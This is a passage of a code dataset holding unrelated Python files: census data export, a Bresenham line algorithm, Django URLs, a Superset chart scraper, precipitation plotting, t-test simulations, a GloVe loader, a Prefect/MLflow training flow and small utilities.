B11002_001E / B01001_001E\",\n (\"grade\", \"K\"): \"B14007_004E * B11002_001E /B01001_001E\",\n (\"grade\", \"G1_4\"): \"(B14007_005E + B14007_006E + B14007_007E + B14007_008E)* B11002_001E / B01001_001E\",\n (\"grade\", \"G5_8\"): \"(B14007_009E + B14007_010E + B14007_011E + B14007_012E)* B11002_001E / 
B01001_001E\",\n (\"grade\", \"G9_12\"): \"(B14007_013E + B14007_014E + B14007_015E + B14007_016E)* B11002_001E / B01001_001E\",\n (\"grade\", \"college_under\"): \"B14007_017E * B11002_001E / B01001_001E\",\n (\"grade\", \"graduate\"): \"B14007_018E * B11002_001E / B01001_001E\",\n (\"grade\", \"not enrolled\"): \"(B14007_019E + B01001_001E - B14007_001E) * B11002_001E / B01001_001E\"\n\n }\n\n dataset = Dataset(base_url, key, pums_url, geo_url, 2016, eval_d, variables_p=eval_p)\n W = dataset.weight\n M = dataset.h_marginal_acs\n X = dataset.sample_df\n W = W.loc[X.index]\n\n var = list(M.drop('nhouseholds_all', axis=1).columns) + ['nhouseholds_all']\n X = X[var]\n M = M[var]\n\n # export csv files\n input_directory = 'C:\\\\Users\\\\xgitiaux\\\\Documents\\\\Research and Analysis\\\\Synthetizer\\\\Data\\\\Inputs'\n filename_x = os.path.join(input_directory, 'sample.csv')\n filename_m = os.path.join(input_directory, 'marginal.csv')\n filename_w = os.path.join(input_directory, 'weight.csv')\n X.to_csv(filename_x)\n M.to_csv(filename_m)\n W.to_csv(filename_w)\n\n # export numpy array\n M = np.array(M)\n X = np.array(X)\n\n filename_x = os.path.join(input_directory, 'sample.npy')\n filename_m = os.path.join(input_directory, 'marginal.npy')\n filename_w = os.path.join(input_directory, 'weight.npy')\n\n np.save(filename_x, X)\n np.save(filename_w, W)\n np.save(filename_m, M)\n","repo_name":"Gitiauxx/PopSynth","sub_path":"CreateData.py","file_name":"CreateData.py","file_ext":"py","file_size_in_byte":10094,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"23793088547","text":"class bresenham:\n\tdef __init__(self, start, end):\n\t\tself.start = list(start)\n\t\tself.end = list(end)\n\t\tself.path = []\n\n\t\tself.steep = abs(self.end[1]-self.start[1]) > abs(self.end[0]-self.start[0])\n\n\t\tif self.steep:\n\t\t\tprint ('Steep gradient')\n\t\t\tself.start = self.swap(self.start[0],self.start[1])\n\t\t\tself.end = self.swap(self.end[0],self.end[1])\n\n\t\tif self.start[0] > self.end[0]:\n\t\t\tprint ('Shallow gradient')\n\t\t\t_x0 = int(self.start[0])\n\t\t\t_x1 = int(self.end[0])\n\t\t\tself.start[0] = _x1\n\t\t\tself.end[0] = _x0\n\n\t\t\t_y0 = int(self.start[1])\n\t\t\t_y1 = int(self.end[1])\n\t\t\tself.start[1] = _y1\n\t\t\tself.end[1] = _y0\n\n\t\tdx = self.end[0] - self.start[0] #change in x\n\t\tdy = abs(self.end[1] - self.start[1]) #change in y\n\t\terror = 0\n\t\tderr = dy/float(dx) #gradient\n\n\t\tystep = 0\n\t\ty = self.start[1]\n\n\t\tif self.start[1] < self.end[1]: ystep = 1\n\t\telse: ystep = -1\n\n\t\tfor x in range(self.start[0],self.end[0]+1):\n\t\t\tif self.steep:\n\t\t\t\tself.path.append((y,x))\n\t\t\telse:\n\t\t\t\tself.path.append((x,y))\n\n\t\t\terror += derr\n\n\t\t\tif error >= 0.5:\n\t\t\t\ty += ystep\n\t\t\t\terror -= 1.0\n\n\t\tprint (start)\n\t\tprint (end)\n\t\tprint ()\n\t\tprint (self.start)\n\t\tprint (self.end)\n\n\tdef swap(self,n1,n2):\n\t\treturn [n2,n1]\n\nprint(\"Consider drawing a line on a raster grid where we restrict the allowable slopes of the line to the range: 0 < m <= 1 \\n\\n\")\nprint (\"Starting coordinates: \")\nx1=int(input(\"x: \"))\ny1=int(input(\"y: \"))\nprint (\"Ending coordinates: \")\nx2=int(input(\"x: \"))\ny2=int(input(\"y: \"))\nprint (\"\\n\")\nl = bresenham([x1,y1],[x2,y2])\nprint (\"\\nPoints to be plotted: \")\nprint (l.path)\n\n\nprint (\"Press return to 
exit.\")\nkey=input()\n","repo_name":"mmunsi2/python","sub_path":"pythonic/Code21_2_Bresenham.py","file_name":"Code21_2_Bresenham.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"36295374734","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n url(r'^admin/', include(admin.site.urls)),\n url(r'^', include('listings.urls')),\n url(r'^login/$', 'listings.views.login'),\n url(r'^logout/$', 'django.contrib.auth.views.logout', {'next_page':'/'}),\n url(r'^register/$', 'listings.views.register'),\n url(r'^about/$', 'listings.views.about'),\n url(r'^calendar/$', 'listings.views.calendar'),\n url(r'^contact/$', 'listings.views.contact'),\n url(r'^faq/$', 'listings.views.faq'),\n url(r'^resources/$', 'listings.views.resources'),\n)\n","repo_name":"reparadocs/PolyProjects","sub_path":"PolyProjects/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"9812798181","text":"import urllib.request\nfrom urllib.error import URLError\n\nfrom bs4 import BeautifulSoup\nfrom django.core.cache import cache\nfrom sentry_sdk import capture_exception\n\nfrom .blocks_ui_text import _ChartBlockStrings\n\n# CACHE_TIMEOUT is in seconds.\nCACHE_TIMEOUT = 60 * 10\nCHARTS_CACHE_KEY = \"superset_charts\"\n\n\nclass SupersetChartRefs:\n def __init__(self, url=\"https://superset-myeqip.catalpa.build/chart/list/\"):\n self.url = url\n\n def _scrape_links_with_beautiful_soup(self):\n with urllib.request.urlopen(self.url) as response:\n html = response.read()\n soup = BeautifulSoup(html)\n all_links = soup(\"a\")\n return all_links\n\n def _get_superset_chart_page_anchors(self):\n try:\n return self._scrape_links_with_beautiful_soup()\n except URLError:\n raise URLError(\"Could not connect to My-EQIP's Superset.\")\n\n def __iter__(self):\n page_anchors = self._get_superset_chart_page_anchors()\n\n for chart_anchor in page_anchors:\n if \"slice_id\" not in chart_anchor[\"href\"]:\n # Ignore page anchors that don't link to charts.\n continue\n\n yield (chart_anchor[\"href\"], chart_anchor.text.strip())\n\n\ndef get_superset_chart_choices():\n chart_names_and_urls = cache.get(CHARTS_CACHE_KEY)\n\n if chart_names_and_urls is not None:\n return chart_names_and_urls\n\n try:\n chart_names_and_urls = tuple(SupersetChartRefs())\n cache.set(CHARTS_CACHE_KEY, chart_names_and_urls, timeout=CACHE_TIMEOUT)\n\n except URLError as e:\n capture_exception(e)\n chart_names_and_urls = [(None, _ChartBlockStrings.superset_connection_error)]\n return chart_names_and_urls\n","repo_name":"andrewerbs/eqis","sub_path":"portal/home/superset_helpers.py","file_name":"superset_helpers.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6438550857","text":"# **************************************************************************** #\n# #\n# ::: :::::::: #\n# precipitation.py :+: :+: :+: #\n# +:+ +:+ +:+ #\n# By: Danilo +#+ +:+ +#+ #\n# +#+#+#+#+#+ +#+ #\n# Created: 2023/06/20 11:48:29 by Danilo #+# #+# #\n# Updated: 2023/06/20 16:45:19 by Danilo ### ########.fr #\n# #\n# **************************************************************************** #\n\n\nimport glob\nimport argparse\nimport f90nml\nimport datetime\nimport 
os\n\nimport numpy as np\nimport pandas as pd\nimport xarray as xr\nimport cmocean.cm as cmo\nimport cartopy.crs as ccrs\n\nimport matplotlib.colors as colors\nimport matplotlib.gridspec as gridspec\nimport matplotlib.pyplot as plt\n\ndef get_times_nml(namelist,model_data):\n ## Identify time range of simulation using namelist ##\n # Get simulation start and end dates as strings\n start_date_str = namelist['nhyd_model']['config_start_time']\n run_duration_str = namelist['nhyd_model']['config_run_duration']\n # Convert strings to datetime object\n start_date = datetime.datetime.strptime(start_date_str, '%Y-%m-%d_%H:%M:%S')\n \n run_duration = datetime.datetime.strptime(run_duration_str,'%d_%H:%M:%S')\n # Get simulation finish date as object and string\n finish_date = start_date + datetime.timedelta(days=run_duration.day,\n hours=run_duration.hour)\n ## Create a range of dates ##\n times = pd.date_range(start_date,finish_date,periods=len(model_data.Time)+1)[1:]\n return times\n\ndef get_exp_name(bench):\n expname = bench.split('/')[-1].split('run.')[-1]\n microp = expname.split('.')[0].split('_')[-1]\n cumulus = expname.split('.')[-1].split('_')[-1] \n return microp+'_'+cumulus\n\ndef get_model_accprec(model_data):\n if ('rainnc' in model_data.variables\n ) and ('rainc' in model_data.variables):\n acc_prec = model_data['rainnc']+model_data['rainc']\n # Get only micrphysics precipitation\n elif ('rainnc' in model_data.variables\n ) and ('rainc' not in model_data.variables):\n acc_prec = model_data['rainnc']\n # Get convective precipitation\n elif ('rainnc' not in model_data.variables\n ) and ('rainc' in model_data.variables):\n acc_prec = model_data['rainc'] \n elif ('rainnc' not in model_data.variables\n ) and ('rainc' not in model_data.variables):\n acc_prec = model_data.uReconstructMeridional[0]*0\n return acc_prec[-1]\n\n## Parser options ##\nparser = argparse.ArgumentParser()\n\nparser.add_argument('-bdir','--bench_directory', type=str, required=True,\n help='''path to benchmark directory''')\nparser.add_argument('-i','--imerg', type=str, default=None, required=True,\n help='''path to IMERG data''')\nparser.add_argument('-o','--output', type=str, default=None,\n help='''output name to append file''')\n\n#args = parser.parse_args()\n\nargs = parser.parse_args(['-bdir', '/p1-nemo/danilocs/mpas/MPAS-BR/benchmarks/Catarina_physics-test/Catarina_250-8km.best-physics_sst/',\n '-i', '/p1-nemo/danilocs/mpas/MPAS-BR/met_data/IMERG/IMERG_20040321-20040325.nc'])\n\nbenchmarks = input(\"prompt experiments (24h, 48h, 48h_sst, 72h_sst, '2403-2903'): \")\n\nif (benchmarks == '48h_sst') or (benchmarks == '72h_sst'):\n ncol, nrow, imax = 2, 2, 3\nelif benchmarks == '2403-2903':\n ncol, nrow, imax = 1, 1, 1\nelse:\n ncol, nrow, imax = 3, 6, 18\nprint('Figure will have ncols:', ncol, 'rows:', nrow, 'n:', imax)\n\n## Start the code ##\nbenchs = glob.glob(args.bench_directory+'/run*')\n# Dummy for getting model times\nmodel_output = benchs[0]+'/latlon.nc'\nnamelist_path = benchs[0]+\"/namelist.atmosphere\"\n# open data and namelist\nmodel_data = xr.open_dataset(model_output)\nnamelist = f90nml.read(glob.glob(namelist_path)[0])\ntimes = get_times_nml(namelist,model_data)\n\nfirst_day = datetime.datetime.strftime(times[0], '%Y-%m-%d')\nlast_day = datetime.datetime.strftime(times[-2], '%Y-%m-%d')\nimerg = xr.open_dataset(args.imerg).sel(lat=slice(model_data.latitude[-1],\n model_data.latitude[0]),lon=slice(model_data.longitude[0],\n model_data.longitude[-1])).sel(time=slice(first_day,last_day))\nprint(imerg) \n 
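# Note: the accumulation below collapses the IMERG series into one total-precipitation
# field by cumulatively summing along time and keeping the last slice. A minimal
# sketch of the same idea, assuming a hypothetical xarray.DataArray 'da' with a
# leading 'time' dimension (not a variable from this script):
#   acc = da.cumsum(dim='time')[-1]   # same total as da.sum(dim='time')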
\nprint('Using IMERG data from',first_day,'to',last_day) \nimerg_accprec = imerg.precipitationCal.cumsum(dim='time')[-1].transpose(\n 'lat', 'lon')\nprint('Maximum acc prec:',float(imerg_accprec.max()))\n\nprint('\\nOpening all data and putting it into a dictionary...')\ndata = {}\ndata['IMERG'] = imerg_accprec\n\nfor bench in benchs:\n \n experiment = get_exp_name(bench)\n print('\\n',experiment)\n \n model_data = xr.open_dataset(bench+'/latlon.nc').chunk({\"Time\": -1})\n model_data = model_data.assign_coords({\"Time\":times})\n\n acc_prec = get_model_accprec(model_data)\n acc_prec = acc_prec.where(acc_prec >= 0, 0)\n acc_prec_interp = acc_prec.interp(latitude=imerg_accprec.lat,\n longitude=imerg_accprec.lon,\n method='cubic',assume_sorted=False)\n interp = acc_prec_interp.where(acc_prec_interp >=0, 0).transpose(\n 'lat', 'lon')\n \n print('limits for prec data:',float(acc_prec.min()),float(acc_prec.max()))\n print('limits for interp prec data:',float(acc_prec_interp.min()),\n float(acc_prec_interp.max()))\n \n data[experiment] = {}\n data[experiment]['data'] = acc_prec\n data[experiment]['interp'] = interp\n\n# =============================================================================\n# Plot acc prec maps and bias\n# =============================================================================\nprint('\\nPlotting maps...')\nplt.close('all')\nfig1 = plt.figure(figsize=(10, 12))\nfig2 = plt.figure(figsize=(10, 12))\ngs1 = gridspec.GridSpec(6, 3)\ngs2 = gridspec.GridSpec(6, 3)\ndatacrs = ccrs.PlateCarree()\n\nif (benchmarks == '48h_sst'):\n prec_levels = np.arange(0,375,25)\n bias_levels = np.arange(-200,225,25)\n bias_norm = colors.TwoSlopeNorm(vmin=-200, vcenter=0, vmax=200)\nelif (benchmarks == '72h_sst'):\n prec_levels = np.arange(0,450,25)\n bias_levels = np.arange(-300,275,25)\n bias_norm = colors.TwoSlopeNorm(vmin=-300, vcenter=0, vmax=225)\n\ni = 0\nfor col in range(ncol):\n for row in range(nrow):\n \n if i == imax:\n break\n \n bench = benchs[i]\n experiment = get_exp_name(bench)\n print('\\n',experiment)\n \n prec = data[experiment]['data']\n prec_interp = data[experiment]['interp']\n \n for fig in [fig1,fig2]:\n \n ax = fig.add_subplot(gs1[row, col], projection=datacrs,frameon=True)\n \n ax.set_extent([-55, -30, -20, -35], crs=datacrs) \n gl = ax.gridlines(draw_labels=True,zorder=2,linestyle='dashed',\n alpha=0.8, color='#383838')\n gl.xlabel_style = {'size': 16, 'color': '#383838'}\n gl.ylabel_style = {'size': 16, 'color': '#383838'}\n gl.right_labels = None\n gl.top_labels = None\n if row != 5:\n gl.bottom_labels = None\n if col != 0:\n gl.left_labels = None\n \n ax.text(-50,-19,experiment)\n \n if fig == fig1:\n print('Plotting accumulate prec..')\n cf1 = ax.contourf(prec.longitude, prec.latitude, prec,\n cmap=cmo.rain, levels=prec_levels)\n print('prec limits:',float(prec.min()), float(prec.max()))\n else:\n print('Plotting bias..')\n bias = prec_interp-imerg_accprec\n cf2 = ax.contourf(imerg_accprec.lon, imerg_accprec.lat,bias,\n cmap=cmo.balance_r,\n levels=bias_levels, norm=bias_norm)\n print('bias limits:',float(bias.min()), float(bias.max()))\n ax.coastlines(zorder = 1)\n i+=1\n\nfor fig, cf in zip([fig1, fig2], [cf1, cf2]):\n cb_axes = fig.add_axes([0.85, 0.18, 0.04, 0.6])\n fig.colorbar(cf, cax=cb_axes, orientation=\"vertical\") \n fig.subplots_adjust(wspace=0.1,hspace=0, right=0.8)\n \nif args.output is not None:\n fname = args.output\nelse:\n fname = (args.bench_directory).split('/')[-2].split('.nc')[0]\n\ndirectory = f'./precipitation_{benchmarks}'\nif not 
os.path.exists(directory):\n os.makedirs(directory)\n\n# Save the figure \nfname1 = os.path.join(directory, f'{fname}_accprec.png')\nfname2 = os.path.join(directory, f'{fname}_acc_prec_bias.png')\nfig1.savefig(fname1, dpi=300)\nprint(\"Saved {}\".format(fname1))\nfig2.savefig(fname2, dpi=300)\nprint(\"Saved {}\".format(fname2))\n\n# =============================================================================\n# Plot IMERG acc prec\n# =============================================================================\nprint('\\nPlotting IMERG data..')\nplt.close('all')\nfig = plt.figure(figsize=(10, 10))\ndatacrs = ccrs.PlateCarree()\nax = fig.add_subplot(111, projection=datacrs,frameon=True)\nax.set_extent([-55, -30, -20, -35], crs=datacrs) \ngl = ax.gridlines(draw_labels=True,zorder=2,linestyle='dashed',\n alpha=0.8, color='#383838')\ngl.xlabel_style = {'size': 16, 'color': '#383838'}\ngl.ylabel_style = {'size': 16, 'color': '#383838'}\ngl.right_labels = None\ngl.top_labels = None\ncf = ax.contourf(imerg_accprec.lon, imerg_accprec.lat,\n imerg_accprec, cmap=cmo.rain,\n levels=prec_levels)\nfig.colorbar(cf, ax=ax, fraction=0.03, pad=0.1)\nax.coastlines(zorder = 1)\n\nimergname = args.imerg.split('/')[-1].split('.nc')[0]\nfname1 = os.path.join(directory, f'{imergname}_accprec.png')\nplt.savefig(fname1, dpi=300)\nprint(\"Saved {}\".format(fname1))\n","repo_name":"daniloceano/MPAS-A_Catarina_Physics-Test","sub_path":"figures_MPAS-worshop/precipitation.py","file_name":"precipitation.py","file_ext":"py","file_size_in_byte":10396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42668875126","text":"import numpy as np\nfrom samplingFunctions import *\nimport scipy.stats\n\nnum_iterations = 10\ntreatments = [\"control\",\"v1\",\"v2\",\"v3\",\"v4\",\"v5\"]\nsample_sizes = [30,100,500]\nmedians = range(1,8)\nh0_median = 4\n\nif __name__ == \"__main__\":\n\n with open(\"t-test-one-sided.csv\", \"w\") as f:\n f.write(\"id,treatment,sample_size,median,p_value,sd,lower,upper\\n\")\n id = 1\n data = None\n for median in medians:\n for sample_size in sample_sizes:\n for treatment in treatments:\n p_vals = []\n for i in range(num_iterations):\n if treatment == \"control\":\n data = sampleIndependentNormal(numSamples=sample_size, offset=median)\n if treatment == \"v1\":\n # v1: Errors from Independent Normal not centered at zero, still constant variance.\n data = sampleIndependentNormal(numSamples=sample_size, offset=median, error_mean=np.random.normal(size=1))\n if treatment == \"v2\":\n # v2: Errors from Independent Normal centered at zero, but non-constant variance.\n data = sampleIndependentNormalNonConstantVariance(numSamples=sample_size, offset=median)\n if treatment == \"v3\":\n # v3: Errors are independent but drawn from a logistic distribution.\n data = sampleIndependentContinuousSymmetric(numSamples=sample_size,offset=median)\n if treatment == \"v4\":\n # v4: Errors are dependent and drawn from a Normal distribution.\n data = generateDependentSamplesLatentNormal(numSamples=sample_size,offset=median)\n if treatment == \"v5\":\n # v5: Errors are independent and from Normal distribution, but data is discretized.\n data = sampleIndependentNormal(numSamples=sample_size,offset=median,discrete=True)\n test_result = scipy.stats.ttest_1samp(data,popmean=h0_median)\n t_stat = test_result[0]\n two_sided_p_val = test_result[1]\n one_sided_p_val = two_sided_p_val / 2\n p_val = one_sided_p_val if t_stat > 0 else 1 - one_sided_p_val\n 
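# Note: scipy.stats.ttest_1samp returns a two-sided p-value, so halving it
 # only yields the one-sided (greater) p-value when t_stat is positive;
 # otherwise the sample mean sits in the opposite tail. Worked example with
 # assumed numbers (not from an actual run): two-sided p = 0.04 with t = +2.1
 # gives one-sided p = 0.02, while t = -2.1 with the same two-sided p gives
 # 1 - 0.02 = 0.98.\n 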
p_vals.append(p_val)\n p_value = np.mean(p_vals)\n sd = np.std(p_vals)\n lower = np.percentile(p_vals,5)\n upper = np.percentile(p_vals,95)\n f.write(\"%d,%s,%d,%d,%.9f,%.9f,%.9f,%.9f\\n\" % (id,treatment,sample_size,median,p_value,sd,lower,upper))\n id += 1\n","repo_name":"lsouth/likert-project","sub_path":"t-test.py","file_name":"t-test.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12492387715","text":"import logging\nimport sys\n\nimport gflags\nimport numpy as np\n\nFLAGS = gflags.FLAGS\n\ngflags.DEFINE_string('glove_pretrained_data', '/scratch/data/glove/glove.test.txt',\n 'location of the glove pretrained data file.')\n\n\nclass GloveEmbeddings:\n def __init__(self):\n self.embeddings = {}\n logging.info(\"Loading embeddings from file \" + FLAGS.glove_pretrained_data)\n logging.info(\"Will take upto several minutes...\")\n with open(FLAGS.glove_pretrained_data) as f:\n for line in f:\n split = line.split(' ')\n self.embeddings[split[0]] = np.array([float(i) for i in split[1:]])\n self.vocab_size = len(self.embeddings)\n self.embedding_dimension = self.embedding_size()\n logging.info(\"Done loading embedding from file.\")\n\n def get_embedding(self, word):\n if word in self.embeddings:\n return self.embeddings[word]\n else:\n return np.zeros(self.embedding_size())\n\n def embedding_size(self):\n return len(self.embeddings['a'])\n\n\nif __name__ == '__main__':\n gflags.DEFINE_boolean('verbose', True, 'turn on debug output, local only.')\n FLAGS(sys.argv)\n e = GloveEmbeddings()\n print(e.embeddings['hello'])\n print(e.embedding_dimension)\n print(e.vocab_size)\n","repo_name":"fredfung007/alert","sub_path":"model/tracking_by_natural_language_description/glove_embeddings.py","file_name":"glove_embeddings.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"10102212496","text":"# -*- coding: utf-8 -*-\n\"\"\"\nThis module defines the Prefect flow for orchestrating model training, using the\nfunctions and methods defined in src.models.train_model.\n\"\"\"\nimport os\nfrom typing import Any, Dict, List, Optional, Union\n\nimport mlflow\nfrom dotenv import find_dotenv, load_dotenv\nfrom mlflow.tracking import MlflowClient\nfrom prefect import flow, get_run_logger, task\nfrom prefect.task_runners import SequentialTaskRunner\n\nimport src.models.train_model as tm\n\nALL_SEARCH_PARAMS = tm.ALL_SEARCH_PARAMS\n\nload_dotenv(find_dotenv())\nFEATURE_STORE_URI = os.getenv(\"FEATURE_STORE_URI\", \"localhost:5432\")\nFEATURE_STORE_PW = os.getenv(\"FEATURE_STORE_PW\")\nDATABASE_URI = f\"postgresql+psycopg2://postgres:{FEATURE_STORE_PW}@{FEATURE_STORE_URI}\"\ntm.EXP_NAME = os.getenv(\"EXP_NAME\", \"exercise_prediction_naive_feats\")\nDEBUG = os.getenv(\"DEBUG\", \"false\") == \"true\"\nif DEBUG:\n tm.EXP_NAME = tm.EXP_NAME + \"_debug\"\n\ntm.DATABASE_URI = DATABASE_URI\ntm.MLFLOW_TRACKING_SERVER = os.getenv(\"MLFLOW_TRACKING_SERVER\", \"localhost:5000\")\ntm.FEATURIZE_ID = os.getenv(\"FEATURIZE_ID\")\n\nmlflow.set_tracking_uri(f\"http://{tm.MLFLOW_TRACKING_SERVER}\")\nmlflow.set_experiment(tm.EXP_NAME)\n\ntm.CLIENT = MlflowClient(f\"http://{tm.MLFLOW_TRACKING_SERVER}\")\ntm.EXP_ID = dict(mlflow.get_experiment_by_name(tm.EXP_NAME))[\"experiment_id\"]\n\nload_data = task(tm.load_data, name=\"Data Loading\") # type: ignore\nprocess_columns = task(tm.process_columns, name=\"Preprocessing\") # type: 
ignore\nmodel_search = task( # type: ignore\n tm.model_search, name=\"Model Hyperparameter Search with hyperopt\"\n)\ntrain_log_best_model = task( # type: ignore\n tm.train_log_best_model, name=\"Train and Log Best Model\"\n)\ntest_log_best_model = task( # type: ignore\n tm.test_log_best_model, name=\"Test and Log Best-Model Accuracy\"\n)\ncompare_with_registered_models = task( # type: ignore\n tm.compare_with_registered_models, name=\"Compare with Registered Models\"\n)\n\n\n@flow(\n name=\"Model Training\",\n task_runner=SequentialTaskRunner(),\n)\ndef train_flow(\n table_name: str = \"naive_frequency_features\",\n label_col: str = \"label_group\",\n model_search_json: str = \"./model_search.json\",\n initial_points_json: Optional[str] = None,\n) -> None:\n # pylint: disable=too-many-locals\n # pylint: disable=protected-access\n \"\"\"\n This function loads the data, performs a search over the hyperparameters using hyperopt,\n and then trains the best model on the training data and tests it on the test data.\n Finally, it compares the best model from this training to the existing model in\n production (if one exists) and registers and promotes the model to staging if either\n no production model exists or the new model has a better accuracy.\n\n Args:\n table_name (str): the name of the table in the database that contains the data\n label_col (str): the name of the column in the data that contains the labels\n model_search_json (str): This is the path to the JSON file that contains the model\n name, fixed parameters, and search parameters. Defaults to ./model_search.json\n initial_points_json (Optional[str]): This is the path to the JSON file that\n contains starting points for hyperparameter values for fitting procedure (e.g., to\n use values from previous fit to potentially speed up fitting). 
Defaults to None\n \"\"\"\n logger = get_run_logger()\n logger.info(\"loading metadata\")\n model_search_params = tm._read_json(model_search_json)\n data_limits = [\n model_search_params[\"train_limit\"],\n model_search_params[\"validation_limit\"],\n ]\n model_name = model_search_params[\"model\"]\n fixed_params = model_search_params[\"fixed_paramaters\"]\n search_params = model_search_params[\"search_parameters\"]\n fmin_rstate = model_search_params[\"fmin_rstate\"]\n\n initial_points: Optional[Union[List[Dict[Any, Any]], Dict[Any, Any]]] = None\n if initial_points_json:\n logger.info(\n \"loading hyperparameter starting points from %s...\", initial_points_json\n )\n initial_points = tm._read_json(initial_points_json)\n # if we have a dict of lists (i.e., multiple starting points), convert to list\n # of dicts\n if any(isinstance(val, list) for val in initial_points.values()):\n initial_points = [\n dict(zip(initial_points, t)) for t in zip(*initial_points.values())\n ]\n else:\n # assume otherwise it is a simply dict with 1 val per key\n initial_points = [initial_points]\n logger.info(\"trials will start with parameters %s\", initial_points)\n\n logger.info(\"loading training and validation data...\")\n df_train_meta, df_val_meta = (\n load_data(table_name, group, limit)\n for group, limit in zip([\"train\", \"validation\"], data_limits)\n )\n logger.info(\"loading complete\")\n\n logger.info(\"performing preprocessing...\")\n x_data = [process_columns(table_name, df) for df in (df_train_meta, df_val_meta)]\n y_data = [df_train_meta[label_col], df_val_meta[label_col]]\n logger.info(\"preprocessing complete\")\n\n logger.info(\"performing model search for %s classifier...\", model_name)\n search_space = {param: ALL_SEARCH_PARAMS[param] for param in search_params}\n best_params, parent_run_id = model_search(\n model_name,\n fixed_params,\n search_space,\n x_data,\n y_data,\n fmin_rstate,\n initial_points,\n )\n logger.info(\"model search complete...parent_run_id=%s\", parent_run_id)\n logger.info(\"best parameters: %s\", best_params)\n\n logger.info(\"logging best model in MLflow...\")\n # first elements in x_data and y_data are training...\n best_clf, best_child_id = train_log_best_model(\n parent_run_id, model_name, best_params, x_data[0], y_data[0]\n )\n logger.info(\"logging complete...best_child_id=%s\", best_child_id)\n\n logger.info(\"loading test data...\")\n # test best model with test data\n df_test_meta = load_data(table_name, \"test\", model_search_params[\"test_limit\"])\n logger.info(\"loading complete\")\n\n logger.info(\"performing preprocessing...\")\n X_test = process_columns(table_name, df_test_meta)\n y_test = df_test_meta[label_col]\n logger.info(\"preprocessing complete\")\n\n logger.info(\"testing best model on test dataset...\")\n best_acc = test_log_best_model(best_child_id, best_clf, X_test, y_test)\n logger.info(\"testing complete\")\n\n logger.info(\"comparing best model with existing registered models\")\n # compare test accuracy from best_child_id with accuracy from previous best\n # in best_run.json (if exists), update json if new accuracy better than previous\n _ = compare_with_registered_models(best_child_id, best_acc)\n logger.info(\"comparison complete\")\n 
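# Note: compare_with_registered_models (the Prefect task wrapped above) decides
 # whether this run's model is registered and promoted; its return value is
 # deliberately unused. A hedged invocation sketch, using the defaults declared
 # in this flow's signature:
 #   train_flow(table_name=\"naive_frequency_features\", label_col=\"label_group\",
 #              model_search_json=\"./model_search.json\")\n 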
logger.info(\"complete\")\n","repo_name":"adamgifford-behavr/exercise_prediction","sub_path":"src/orchestration/orchestrate_train.py","file_name":"orchestrate_train.py","file_ext":"py","file_size_in_byte":6805,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"12541964419","text":"\"\"\"\nGiven four lists A, B, C, D of integer values, compute how many tuples (i, j, k, l)\nthere are such that A[i] + B[j] + C[k] + D[l] is zero.\n\"\"\"\n\nclass Solution:\n def fourSumCount(self, A,B,C,D):\n d = {}\n answer = 0\n\n for num in A:\n for num2 in B:\n d[num + num2] = d.get(num + num2, 0) + 1\n for num in C:\n for num2 in D:\n answer += d.get(-(num + num2), 0)\n return answer\n\n\nA = [ 1, 2]\nB = [-2,-1]\nC = [-1, 2]\nD = [ 0, 2]\ns = Solution()\nprint(s.fourSumCount(A,B,C,D))","repo_name":"IamJayanthiReddy/leetcode","sub_path":"december_challenge/sum4.py","file_name":"sum4.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"72811305708","text":"from typing import Type, Callable\n\n\ndef after_previous_gen():\n order_no = 1\n while True:\n yield order_no\n order_no += 1\n\n\ndef raises(e: Type[Exception], callable_: Callable):\n try:\n callable_()\n except e:\n return True\n else:\n return False\n\n\ndef is_sorted(lst):\n return all(lst[i] >= lst[i + 1] for i in range(len(lst) - 1))\n","repo_name":"exadel-inc/CompreFace","sub_path":"embedding-calculator/src/services/utils/pytestutils.py","file_name":"pytestutils.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":3424,"dataset":"github-code","pt":"37"}
+{"seq_id":"37409099141","text":"'''\nhttps://www.hackerrank.com/challenges/find-digits/submissions/code/102916653\n\nAn integer d is a divisor of an integer n if the remainder of n/d is 0.\n\nGiven an integer, for each digit that makes up the integer determine whether it is a divisor. 
Count the number of divisors occurring within the integer.\n\n'''\n#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# Complete the findDigits function below.\ndef findDigits(n):\n list1 = str(n)\n count = 0\n for i in list1:\n if int(i) != 0 and n % int(i) == 0:\n count += 1\n return count \n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n t = int(input())\n\n for t_itr in range(t):\n n = int(input())\n\n result = findDigits(n)\n\n fptr.write(str(result) + '\\n')\n\n fptr.close()\n","repo_name":"leewalter/coding","sub_path":"python/hackerrank/find_digits_divisors.py","file_name":"find_digits_divisors.py","file_ext":"py","file_size_in_byte":826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
